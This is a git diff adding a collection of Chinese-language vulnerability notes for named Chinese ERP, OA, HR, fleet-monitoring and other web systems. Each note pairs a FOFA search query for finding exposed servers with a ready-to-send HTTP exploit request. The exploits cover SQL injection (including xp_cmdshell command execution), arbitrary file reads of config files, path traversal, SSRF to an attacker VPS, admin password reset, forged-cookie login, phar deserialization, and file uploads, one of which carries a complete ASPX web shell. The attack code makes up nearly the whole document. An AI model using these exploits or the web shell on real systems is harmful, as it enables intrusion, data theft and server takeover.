+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ybopp6ucfh9lsdrz>
\ No newline at end of file
diff --git a/朗新天霁智能eHR人力资源管理系统GetE01ByDeptCode存在SQL注入漏洞.md b/朗新天霁智能eHR人力资源管理系统GetE01ByDeptCode存在SQL注入漏洞.md
new file mode 100644
index 0000000..1005467
--- /dev/null
+++ b/朗新天霁智能eHR人力资源管理系统GetE01ByDeptCode存在SQL注入漏洞.md
@@ -0,0 +1,29 @@
+# 朗新天霁智能eHR人力资源管理系统GetE01ByDeptCode存在SQL注入漏洞
+
+朗新天霁智能eHR人力资源管理系统GetE01ByDeptCode存在SQL注入漏洞，攻击者可获取数据库敏感数据。
+
+## fofa
+
+```java
+body="divRememberPwd"
+```
+
+## poc
+
+```java
+POST /api/Com/GetE01ByDeptCode HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/json
+Connection: close
+ 
+{"deptCode":"1') AND 8104=8104 AND ('UCOF'='UCOF"}
+```
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/YukReJJYMHD0tuZyfgcjhg
\ No newline at end of file
diff --git a/朗速ERP系统FileUploadApi.ashx存在文件上传漏洞.md b/朗速ERP系统FileUploadApi.ashx存在文件上传漏洞.md
new file mode 100644
index 0000000..506d24d
--- /dev/null
+++ b/朗速ERP系统FileUploadApi.ashx存在文件上传漏洞.md
@@ -0,0 +1,44 @@
+# 朗速ERP系统FileUploadApi.ashx存在文件上传漏洞
+
+
+
+## fofa
+```javascript
+body="/Resource/Scripts/Yw/Yw_Bootstrap.js"
+```
+
+## poc
+```javascript
+POST /Api/FileUploadApi.ashx?method=DoWebUpload HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
+Accept: */*
+Connection: close
+
+------WebKitFormBoundaryFfJZ4PlAZBixjELj
+Content-Disposition: form-data; name="file"; filename="1.aspx"
+Content-Type: image/jpeg
+
+<%@ Page Language="Jscript" validateRequest="false" %>
+<%
+var c=new System.Diagnostics.ProcessStartInfo("cmd");
+var e=new System.Diagnostics.Process();
+var out:System.IO.StreamReader,EI:System.IO.StreamReader;
+c.UseShellExecute=false;
+c.RedirectStandardOutput=true;
+c.RedirectStandardError=true;
+e.StartInfo=c;
+c.Arguments="/c " + Request.Item["cmd"];
+e.Start();
+out=e.StandardOutput;
+EI=e.StandardError;
+e.Close();
+Response.Write(out.ReadToEnd() + EI.ReadToEnd());
+System.IO.File.Delete(Request.PhysicalPath);
+Response.End();%>
+------WebKitFormBoundaryFfJZ4PlAZBixjELj--
+```
+
+![image-20241227222402497](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272224571.png)
\ No newline at end of file
diff --git a/朗速ERP系统接口UEditorAjaxApi.ashx存在SSRF漏洞.md b/朗速ERP系统接口UEditorAjaxApi.ashx存在SSRF漏洞.md
new file mode 100644
index 0000000..bbe811e
--- /dev/null
+++ b/朗速ERP系统接口UEditorAjaxApi.ashx存在SSRF漏洞.md
@@ -0,0 +1,24 @@
+# 朗速ERP系统接口UEditorAjaxApi.ashx存在SSRF漏洞
+
+朗速ERP UEditorAjaxApi.ashx 接口存在SSRF漏洞,未经身份验证的远程攻击者可以利用该漏洞在VPS上构造恶意文件，使服务器访问并下载文件到本地，进而控制服务器权限。
+
+## fofa
+```javascript
+body="/Resource/Scripts/Yw/Yw_Bootstrap.js"
+```
+
+## poc
+```javascript
+POST /Api/UEditor/UEditorAjaxApi.ashx?method=catchimage HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br, zstd
+Content-Type: application/x-www-form-urlencoded; charset=utf-8
+Connection: keep-alive
+
+source[]=http://vpsip
+```
+
+![image-20250103185025413](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501031850476.png)
\ No newline at end of file
diff --git a/杜特网上订单管理系统Login.ashx存在SQL注入漏洞.md b/杜特网上订单管理系统Login.ashx存在SQL注入漏洞.md
new file mode 100644
index 0000000..b593540
--- /dev/null
+++ b/杜特网上订单管理系统Login.ashx存在SQL注入漏洞.md
@@ -0,0 +1,24 @@
+# 杜特网上订单管理系统Login.ashx存在SQL注入漏洞
+
+杜特网上订单管理系统Login.ashx存在SQL注入漏洞
+
+## fofa
+
+```javascript
+app="TUTORSOFT-ERP"
+```
+
+## poc
+
+```javascript
+POST /ajax/Login.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+LoginCode=1';WAITFOR+DELAY+'0:0:5'--&Password=1&ckRemember=0
+```
+
diff --git a/杜特网上订单管理系统getUserImage.ashx存在SQL注入漏洞.md b/杜特网上订单管理系统getUserImage.ashx存在SQL注入漏洞.md
new file mode 100644
index 0000000..4eb437b
--- /dev/null
+++ b/杜特网上订单管理系统getUserImage.ashx存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 杜特网上订单管理系统getUserImage.ashx存在SQL注入漏洞
+
+杜特网上订单管理系统getUserImage.ashx存在SQL注入漏洞
+
+## fofa
+
+```javascript
+app="TUTORSOFT-ERP"
+```
+
+## poc
+
+```javascript
+GET /ajax/getUserImage.ashx?locadCode=admin%27/**/and(select+1)>0waitfor/**/delay%270:0:5 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20241219151440983](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191514043.png)
diff --git a/杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞.md b/杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞.md
new file mode 100644
index 0000000..f8b7c22
--- /dev/null
+++ b/杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞.md
@@ -0,0 +1,20 @@
+# 杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞
+
+杭州三一谦成科技车辆监控服务平台接口 /gps-web/platformSql 存在SQL 注入漏洞
+
+
+
+## poc
+
+```java
+POST /gps-web/platformSql HTTP/1.1
+Host:
+User-Agent: python-requests/2.28.1
+Accept-Encoding: gzip, deflate
+Accept: */* Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 74
+
+action=EXEC_SQL&params=SELECT schema_name FROM information_schema.schemata
+```
+
diff --git a/极简云验证系统download存在任意文件读取漏洞.md b/极简云验证系统download存在任意文件读取漏洞.md
new file mode 100644
index 0000000..8668d44
--- /dev/null
+++ b/极简云验证系统download存在任意文件读取漏洞.md
@@ -0,0 +1,28 @@
+# 极简云验证系统download存在任意文件读取漏洞
+
+# 一、漏洞简介
+  极简云验证系统是一种简洁高效的身份验证方案，通过使用云端技术，实现用户身份验证和访问控制。用户只需输入手机号或邮箱等基本信息，系统即可发送验证码，验证过程快速便捷。此系统具有高度可扩展性和安全性，可适用于各种应用场景，如登录、支付等。同时，它还支持多种验证方式，如短信验证码、邮箱验证码等，为用户提供了灵活多样的选择。极简云验证系统download存在任意文件读取漏洞.
+
+# 二、影响版本
++ 极简云验证系统
+
+# 三、资产测绘
++ fofa`body="/js/lib/slimscroll.js"`
++ 特征
+
+![1716702913106-fec91c96-5f2a-4063-a0e5-b65356000943.png](./img/LoAiN1zPg1DKrr7w/1716702913106-fec91c96-5f2a-4063-a0e5-b65356000943-988402.png)
+
+# 四、漏洞复现
+```plain
+GET /download.php?file=20b6cb088a8d5c444074&filename=config.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 0
+```
+
+![1716702895265-c8e22574-c199-4d32-9242-a80b5e812e26.png](./img/LoAiN1zPg1DKrr7w/1716702895265-c8e22574-c199-4d32-9242-a80b5e812e26-138711.png)
+
+
+
+> 更新: 2024-06-01 11:14:22  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/opf4xa6pir84dgb4>
\ No newline at end of file
diff --git a/极简云验证系统存在敏感信息泄露漏洞.md b/极简云验证系统存在敏感信息泄露漏洞.md
new file mode 100644
index 0000000..765d9de
--- /dev/null
+++ b/极简云验证系统存在敏感信息泄露漏洞.md
@@ -0,0 +1,32 @@
+# 极简云验证系统存在敏感信息泄露漏洞
+
+# 一、漏洞简介
+  极简云验证系统是一种简洁高效的身份验证方案，通过使用云端技术，实现用户身份验证和访问控制。用户只需输入手机号或邮箱等基本信息，系统即可发送验证码，验证过程快速便捷。此系统具有高度可扩展性和安全性，可适用于各种应用场景，如登录、支付等。同时，它还支持多种验证方式，如短信验证码、邮箱验证码等，为用户提供了灵活多样的选择。此系统某接口存在信息泄露。
+
+# 二、影响版本
++  深澜计费管理系统
+
+# 三、资产测绘
++ fofa`body="/js/lib/slimscroll.js"`
++ 特征
+
+![1716703161984-d5a483f8-056b-476a-9a36-357d4813a920.png](./img/D238bvh7ZMl7LoVs/1716703161984-d5a483f8-056b-476a-9a36-357d4813a920-296981.png)
+
+# 四、漏洞复现
+```plain
+GET /%E6%95%B0%E6%8D%AE%E5%BA%93.sql HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+
+```
+
+![1716703107785-ee5492bd-bc33-43f1-a1a8-dfbb4f5707fc.png](./img/D238bvh7ZMl7LoVs/1716703107785-ee5492bd-bc33-43f1-a1a8-dfbb4f5707fc-247991.png)
+
+
+
+> 更新: 2024-06-01 11:16:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qbws9m6nyom3i35t>
\ No newline at end of file
diff --git a/某U挖矿质押单语言系统imageupload后台任意文件上传漏洞.md b/某U挖矿质押单语言系统imageupload后台任意文件上传漏洞.md
new file mode 100644
index 0000000..60cb1bc
--- /dev/null
+++ b/某U挖矿质押单语言系统imageupload后台任意文件上传漏洞.md
@@ -0,0 +1,38 @@
+# 某U挖矿质押单语言系统imageupload后台任意文件上传漏洞
+
+位于 /admin/controller/News.php 控制器的 imageupload 方法存在一个很明显的上传文件操作file()，且无任何限制，导致漏洞产生
+
+## fofa
+
+```java
+"/static/index/css/login/framework7.ios.min.css"
+```
+
+## poc
+
+```javascript
+POST /admin/news/imageupload HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cache-Control: max-age=0Connection: keep-alive
+Content-Length: 197
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryydBYM59rmMIhj0gw
+Cookie: PHPSESSID=jt6bie950imjojfm9aj6hpfl10
+Host: 127.0.0.1:81
+Origin: http://127.0.0.1:81
+Referer: http://127.0.0.1:81/admin/news/imageupload
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: noneUpgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+
+------WebKitFormBoundary03rNBzFMIytvpWhy
+Content-Disposition: form-data; name="file"; filename="1.php"
+Content-Type: image/jpeg
+
+<?php phpinfo();?>
+------WebKitFormBoundary03rNBzFMIytvpWhy--
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408281248642.webp)
\ No newline at end of file
diff --git a/某U挖矿质押单语言系统前台未授权修改管理员密码.md b/某U挖矿质押单语言系统前台未授权修改管理员密码.md
new file mode 100644
index 0000000..dce7b43
--- /dev/null
+++ b/某U挖矿质押单语言系统前台未授权修改管理员密码.md
@@ -0,0 +1,23 @@
+# 某U挖矿质押单语言系统前台未授权修改管理员密码
+
+位于 /admin/controller/Login.php 有个很明显操纵SQL的update操作，重置了管理员的密码为123456，且未设置鉴权，非常明显是个后门
+
+## fofa
+
+```java
+"/static/index/css/login/framework7.ios.min.css"
+```
+
+## poc
+
+```
+/admin/login/setpassword
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408281245679.webp)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/EL-1pxjTNUS5fAKVX1zlrQ
\ No newline at end of file
diff --git a/某U挖矿质押单语言系统后台phar反序列漏洞.md b/某U挖矿质押单语言系统后台phar反序列漏洞.md
new file mode 100644
index 0000000..f112a70
--- /dev/null
+++ b/某U挖矿质押单语言系统后台phar反序列漏洞.md
@@ -0,0 +1,23 @@
+# 某U挖矿质押单语言系统后台phar反序列漏洞
+
+**位于 /admin/controller/Cache.php 控制器的 deldir 方法存在file_exists 函数，该函数可以直接导致Phar反序列化漏洞触发**
+
+## fofa
+
+```javascript
+"/static/index/css/login/framework7.ios.min.css"
+```
+
+## poc
+
+首先我们需要用phpggc生成一个绕过图片检测的phar反序列化脚本，用一张正常图片即可
+
+```
+./phpggc -pj 123.jpg -o evil.jpg ThinkPHP/RCE2 system whoami
+```
+
+```
+/admin/cache/deldir?backup_file=phar://图片地址
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408281250731.webp)
\ No newline at end of file
diff --git a/某业务管理系统LoginUser存在信息泄露漏洞.md b/某业务管理系统LoginUser存在信息泄露漏洞.md
new file mode 100644
index 0000000..f4c5405
--- /dev/null
+++ b/某业务管理系统LoginUser存在信息泄露漏洞.md
@@ -0,0 +1,34 @@
+# 某业务管理系统LoginUser存在信息泄露漏洞
+
+某业务管理系统LoginUser存在信息泄露漏洞
+
+## fofa
+
+```yaml
+body="/Content/LayuiAdmin/login/css/index.css"
+```
+
+## poc
+
+```
+POST /Login/LoginUser HTTP/1.1
+Host: your-ip
+Content-Length: 79
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+
+{"RecordID":"admin","password":"11111","undefined":"登录","language":"zh-CN"}
+```
+
+![image-20240821111211654](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408211112724.png)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/L9_i0oTvhkAAPu94YzAL4Q
\ No newline at end of file
diff --git a/某二开版海外抢单Shua单系统存在任意用户登录漏洞 2.md b/某二开版海外抢单Shua单系统存在任意用户登录漏洞 2.md
new file mode 100644
index 0000000..4775bd0
--- /dev/null
+++ b/某二开版海外抢单Shua单系统存在任意用户登录漏洞 2.md	
@@ -0,0 +1,33 @@
+# 某二开版海外抢单Shua单系统存在任意用户登录漏洞
+
+**位于 /index/controller/Base.php 控制器的 __construct 方法作为验证登录控制器，来验证用户是否登录，然而这套系统实际采用两套验证用户的方法，Session和Cookie并存，其中 if (!$uid) { $uid = cookie('user_id'); } 这句话是关键，如果Session中没有发现user_id，那么直接验证Cookie中的user_id，而Cookie是可以伪造的，这里导致漏洞产生。**
+
+## fofa
+
+```javascript
+"/red/popper.min.js"
+```
+
+## poc
+
+```javascript
+GET /index/index HTTP/1.1
+Accept: */*
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Connection: keep-alive
+Content-Length: 73
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: user_id=1
+Host: 127.0.0.1:81
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+User-Token-Csrf: csrf66e28d7ebbffaX-Requested-With: 
+```
+
+![9eba17aa45f2b298e11a600cd389774d](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409131335933.jpg)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/wArXDFITAjeTG0IRA0B5rg
\ No newline at end of file
diff --git a/某二开版海外抢单Shua单系统存在任意用户登录漏洞.md b/某二开版海外抢单Shua单系统存在任意用户登录漏洞.md
new file mode 100644
index 0000000..cc183de
--- /dev/null
+++ b/某二开版海外抢单Shua单系统存在任意用户登录漏洞.md
@@ -0,0 +1,37 @@
+# 某二开版海外抢单Shua单系统存在任意用户登录漏洞
+
+# 一、漏洞简介
+位于 /index/controller/Base.php 控制器的 __construct 方法作为验证登录控制器，来验证用户是否登录，然而这套系统实际采用两套验证用户的方法，Session和Cookie并存，其中 if (!$uid) { $uid = cookie('user_id'); } 这句话是关键，如果Session中没有发现user_id，那么直接验证Cookie中的user_id，而Cookie是可以伪造的，这里导致漏洞产生。
+
+# 二、影响版本
++ 海外刷单系统
+
+# 三、资产测绘
++ fofa`"/red/popper.min.js"`
++ 特征
+
+![1726293548455-c7775462-88de-45a6-b23f-cf853d650096.png](./img/Gmllb7LmtIMFJzui/1726293548455-c7775462-88de-45a6-b23f-cf853d650096-992981.png)
+
+# 四、漏洞复现
+```plain
+GET /index/index HTTP/1.1
+Accept: */*
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Connection: keep-alive
+Content-Length: 73
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: user_id=1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+User-Token-Csrf: csrf66e28d7ebbffaX-Requested-With: 
+```
+
+![1726293582647-1b8a5655-677c-407b-8588-75ea40955731.png](./img/Gmllb7LmtIMFJzui/1726293582647-1b8a5655-677c-407b-8588-75ea40955731-643567.png)
+
+![1726293502362-d4828d91-dc9a-4000-94a6-0945d14bf7d3.png](./img/Gmllb7LmtIMFJzui/1726293502362-d4828d91-dc9a-4000-94a6-0945d14bf7d3-623870.png)
+
+
+
+> 更新: 2024-10-22 09:36:10  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ixpcs4iq19u5yrp4>
\ No newline at end of file
diff --git a/某仿soul欲音社交系统存在任意文件读取漏洞.md b/某仿soul欲音社交系统存在任意文件读取漏洞.md
new file mode 100644
index 0000000..7ca7a8f
--- /dev/null
+++ b/某仿soul欲音社交系统存在任意文件读取漏洞.md
@@ -0,0 +1,27 @@
+# 某仿soul欲音社交系统存在任意文件读取漏洞
+
+位于 /application/api/controller/upload.php 控制器中的tobase64 方法通过传入file参数 然后通过fopen直接读取任意文件，然后输出base64编码后的文件.
+
+## fofa
+
+```javascript
+"/public/style/admin/js/jquery.min.js"
+```
+
+## poc
+
+```php
+GET /api/upload/tobase64?file=conn.php HTTP/1.1
+Host: 127.0.0.1
+Cache-Control: max-age=0
+sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+```
+
+![image-20240902103855273](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409021038369.png)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/SuunBk1lnphYNgixyWegRg
+
diff --git a/某信景云终端安全管理系统存在loginSQL注入漏洞.md b/某信景云终端安全管理系统存在loginSQL注入漏洞.md
new file mode 100644
index 0000000..5d1b5b6
--- /dev/null
+++ b/某信景云终端安全管理系统存在loginSQL注入漏洞.md
@@ -0,0 +1,6 @@
+## 某信景云终端安全管理系统 login SQL注入漏洞 
+```
+POST /api/user/login
+
+captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='
+```
diff --git a/某友时空KSOA-PayBill-SQL注入漏洞.md b/某友时空KSOA-PayBill-SQL注入漏洞.md
new file mode 100644
index 0000000..a158cfc
--- /dev/null
+++ b/某友时空KSOA-PayBill-SQL注入漏洞.md
@@ -0,0 +1,11 @@
+## 某友时空KSOA PayBill SQL注入漏洞
+```
+POST /servlet/PayBill?caculate&_rnd= HTTP/1.1
+Host: 1.1.1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Length: 134
+Accept-Encoding: gzip, deflate
+Connection: close
+
+<?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY '00:00:03';-</name><name>1</name><name>102360</name></root>
+```
diff --git a/某和OA-C6-GetSqlData.aspx-SQL注入漏洞.md b/某和OA-C6-GetSqlData.aspx-SQL注入漏洞.md
new file mode 100644
index 0000000..0b0d7f7
--- /dev/null
+++ b/某和OA-C6-GetSqlData.aspx-SQL注入漏洞.md
@@ -0,0 +1,13 @@
+## 某和OA C6-GetSqlData.aspx SQL注入漏洞
+```
+OST /C6/Control/GetSqlData.aspx/.ashx
+Host: ip:port 
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
+Connection: close
+Content-Length: 189
+Content-Type: text/plain
+Accept-Encoding: gzip
+
+exec master..xp_cmdshell 'ipconfig'
+
+```
diff --git a/某微-E-Cology-某版本-SQL注入漏洞.md b/某微-E-Cology-某版本-SQL注入漏洞.md
new file mode 100644
index 0000000..e881bee
--- /dev/null
+++ b/某微-E-Cology-某版本-SQL注入漏洞.md
@@ -0,0 +1,23 @@
+## 某微 E-Cology 某版本 SQL注入漏洞
+```
+POST /dwr/call/plaincall/DocDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
+Host: ip
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
+Content-Length: 191
+Accept-Encoding: gzip
+Connection: close
+Content-Type: text/plain
+ 
+callCount=1
+page=
+httpSessionId=
+scriptSessionId=
+c0-scriptName=DocDwrUtil
+c0-methodName=ifNewsCheckOutByCurrentUser
+c0-id=0
+c0-param0=string:1 and ascii((select substring(loginid,1,1)from HrmResourceManager))=115
+c0-param1=string:1
+batchId=0
+```
+![3a380d7bbc888fb3314bb6b512b4e7db](https://github.com/wy876/POC/assets/139549762/6d40d284-0894-4c18-89dc-5a978d4f5c79)
+
diff --git a/某微E-Office9文件上传漏洞-CVE-2023-2523.md b/某微E-Office9文件上传漏洞-CVE-2023-2523.md
new file mode 100644
index 0000000..86fa262
--- /dev/null
+++ b/某微E-Office9文件上传漏洞-CVE-2023-2523.md
@@ -0,0 +1,34 @@
+## 某微E-Office9文件上传漏洞 CVE-2023-2523
+
+## fofa
+```
+app="泛微-EOffice"
+```
+
+## poc
+```
+POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1
+Host: XXXX:XXX
+Content-Length: 349
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: null
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
+Connection: close
+
+------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+Content-Disposition: form-data; name="upload_quwan"; filename="1.phP"
+Content-Type: image/jpeg
+
+<?php phpinfo();?>
+------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+Content-Disposition: form-data; name="file"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
+```
diff --git a/某微E-Office9文件上传漏洞-CVE-2023-2648.md b/某微E-Office9文件上传漏洞-CVE-2023-2648.md
new file mode 100644
index 0000000..94c95a6
--- /dev/null
+++ b/某微E-Office9文件上传漏洞-CVE-2023-2648.md
@@ -0,0 +1,33 @@
+## 某微E-Office9文件上传漏洞 CVE-2023-2648
+
+```
+POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
+Host: :8085
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
+Content-Length: 491
+
+--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
+Content-Disposition: form-data; name="Filedata"; filename="666.php"
+Content-Type: application/octet-stream
+
+<?php phpinfo();?>
+--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
+--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
+Content-Disposition: form-data; name="file"; filename=""
+Content-Type: application/octet-stream
+
+--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
+```
+![2070a628d476b95724b6b017a3430a45](https://github.com/wy876/POC/assets/139549762/ea43a9b8-d146-49ae-86ce-f28e5b15c185)
+
+webshell路径
+```
+http://10.211.55.3:8082/attachment/1727543347/666.php
+```
diff --git a/某服-sxf-报表系统命令执行漏洞.md b/某服-sxf-报表系统命令执行漏洞.md
new file mode 100644
index 0000000..ee5b339
--- /dev/null
+++ b/某服-sxf-报表系统命令执行漏洞.md
@@ -0,0 +1,18 @@
+## 某服 sxf-报表系统命令执行漏洞
+```
+POST /rep/login HTTP/1.1 
+Host: URL
+Cookie: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0 
+Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2 
+Accept-Encoding: gzip deflate 
+Upgrade-Insecure-Requests: 1 
+Sec-Fetch-Dest: document 
+Sec-Fetch-Mode: navigate 
+Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache14 Te: trailers 
+Connection: close 
+Content-Type:application/x-www-form-urlencoded 
+Content-Length: 126
+
+clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq
+```
diff --git a/某盟-SAS堡垒机-local_user.php-任意用户登录漏洞.md b/某盟-SAS堡垒机-local_user.php-任意用户登录漏洞.md
new file mode 100644
index 0000000..78bc813
--- /dev/null
+++ b/某盟-SAS堡垒机-local_user.php-任意用户登录漏洞.md
@@ -0,0 +1,9 @@
+## 某盟 SAS堡垒机 local_user.php 任意用户登录漏洞
+```
+
+GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
+Host: 1.1.1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Accept-Encoding: gzip, deflate
+Connection: close
+```
